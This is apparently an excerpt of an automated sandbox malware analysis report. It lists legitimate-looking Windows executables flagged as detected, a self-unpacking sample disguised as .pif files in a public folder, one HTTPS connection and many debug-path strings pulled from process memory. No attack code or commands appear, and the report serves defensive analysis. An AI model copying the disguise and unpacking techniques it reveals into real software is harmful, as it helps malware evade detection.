Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: wdmvmswJ.pif, 0000000C.00000003.1554599936.0000000023230000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1530165716.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000001.1581602644.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000000.1581239901.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 00000010.00000003.2967850181.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: wdmvmswJ.pif, 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
